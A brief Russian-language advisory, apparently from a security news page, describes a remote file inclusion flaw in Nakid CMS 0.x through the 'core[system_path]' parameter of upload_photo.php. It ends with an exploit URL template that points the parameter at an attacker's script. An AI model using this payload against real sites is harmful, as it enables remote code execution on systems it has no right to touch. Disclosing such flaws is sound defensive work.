Программа: Nakid CMS 0.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре "core[system_path]" сценарием modules/catalog/upload_photo.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://[victim]/modules/catalog/upload_photo.php?core[system_path]=[evil
script]



Оставить мнение